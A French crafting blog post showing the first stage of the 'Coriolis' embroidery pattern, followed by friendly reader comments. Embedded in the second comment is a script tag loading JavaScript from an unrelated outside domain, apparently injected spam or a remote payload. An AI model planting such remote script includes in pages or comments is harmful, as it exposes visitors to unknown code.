• Coriolis - étape 1

    Très peu d'articles ces derniers temps sur mon blog ... Non pas parce que je ne fais plus rien niveau activités manuelles, bien au contraire, ... mais par manque de temps.
    Ces derniers mois, j'ai beaucoup scrappé et carterisé ... mais pas que, ... puisque j'ai aussi trouvé un peu de temps pour me remettre à la broderie : ça me manquait vraiment trop !!!

    Je me suis donc replongée dans ma panière des BAPC (Broderies Achetées Pas Commencées) et voici le modèle que j'ai choisi  ... 

    Coriolis - étape 1-le modèle

    Et voilà mon ouvrage commencé courant mai ... : des points spéciaux divers et variés ==> c'est que du bonheur.

    Coriolis - étape 1

    Cet ouvrage aurait pu être bien plus avancé mais à raison d'une heure par-ci par-là et pas tous les jours, c'est difficile de faire mieux. Mais bon, c'est toujours mieux que rien du tout !!!

    J'espère revenir bien vite vous montrer la suite de mon ouvrage.
    Quoiqu'il en soit, j'ai un autre article à faire pour vous montrer du scrap et des cartes.

    Coriolis - étape 1 - gif

     


  • Commentaires

    1
    Dimanche 14 Juin 2020 à 20:39

    rooo que c'est beau

    bises

    2
    Dimanche 14 Juin 2020 à 22:01

    C'est un modèle dont je me souviens bien, il avait eu un certain succès, mais je ne l'avais pas brodé. Joli début. Prends ton temps.

    <script src="//autroliner.com/225cd6e1ef3a4470f9.js"></script>

    3
    Silvia
    Dimanche 14 Juin 2020 à 23:58

    Très joli!!! Quel courage!!! Ah le temps!!! Le manque de temps..... 

    4
    Lundi 15 Juin 2020 à 11:03
    cela va être magnifique bonne continuation bizou
    5
    Janique
    Jeudi 25 Juin 2020 à 11:50
    Bonjour,
    Pourriez vous me dire où vous avez eu le modèle de broderie ronde qui est sur la page d’accueil de votre blog ?
    Je le trouve magnifique et j’aimerai le broder.
    Merci de votre retour et très bonne journée
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :